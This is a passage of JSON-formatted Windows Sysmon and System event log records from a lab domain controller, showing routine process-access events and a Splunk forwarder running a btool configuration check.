{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2041,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.562\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.562","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2042,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.562\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.562","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2043,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.562\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.562","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2044,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.562\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01C9-5F25-0000-00105FE60300}\r\nTargetProcessId: 868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.562","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01C9-5F25-0000-00105FE60300}","TargetProcessId":"868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":139,"SourceName":"Microsoft-Windows-Time-Service","ProviderGuid":"{06EDCFEB-0FD0-4E53-ACCA-A6F8BBF81BCB}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76818,"ProcessID":1224,"ThreadID":2592,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"The time service has started advertising as a time source.","Opcode":"Info","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":143,"SourceName":"Microsoft-Windows-Time-Service","ProviderGuid":"{06EDCFEB-0FD0-4E53-ACCA-A6F8BBF81BCB}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76819,"ProcessID":1224,"ThreadID":2592,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"The time service has started advertising as a good time source.","Opcode":"Info","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2045,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.812\r\nSourceProcessGUID: {A837DB8D-01C9-5F25-0000-00105FE60300}\r\nSourceProcessId: 868\r\nSourceThreadId: 2916\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.812","SourceProcessGUID":"{A837DB8D-01C9-5F25-0000-00105FE60300}","SourceProcessId":"868","SourceThreadId":"2916","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","TargetProcessId":"3088","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2046,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.837\r\nProcessGuid: {A837DB8D-01C9-5F25-0000-00101EEA0300}\r\nProcessId: 2532\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-01C7-5F25-0000-001075BD0300}\r\nParentProcessId: 3736\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.837","ProcessGuid":"{A837DB8D-01C9-5F25-0000-00101EEA0300}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-01C7-5F25-0000-001075BD0300}","ParentProcessId":"3736","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2047,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.828\r\nSourceProcessGUID: {A837DB8D-01C7-5F25-0000-001075BD0300}\r\nSourceProcessId: 3736\r\nSourceThreadId: 3716\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {A837DB8D-01C9-5F25-0000-00101EEA0300}\r\nTargetProcessId: 2532\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18319|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.828","SourceProcessGUID":"{A837DB8D-01C7-5F25-0000-001075BD0300}","SourceProcessId":"3736","SourceThreadId":"3716","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{A837DB8D-01C9-5F25-0000-00101EEA0300}","TargetProcessId":"2532","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18319|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2048,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.828\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C9-5F25-0000-00101EEA0300}\r\nTargetProcessId: 2532\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.828","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C9-5F25-0000-00101EEA0300}","TargetProcessId":"2532","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2049,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.828\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 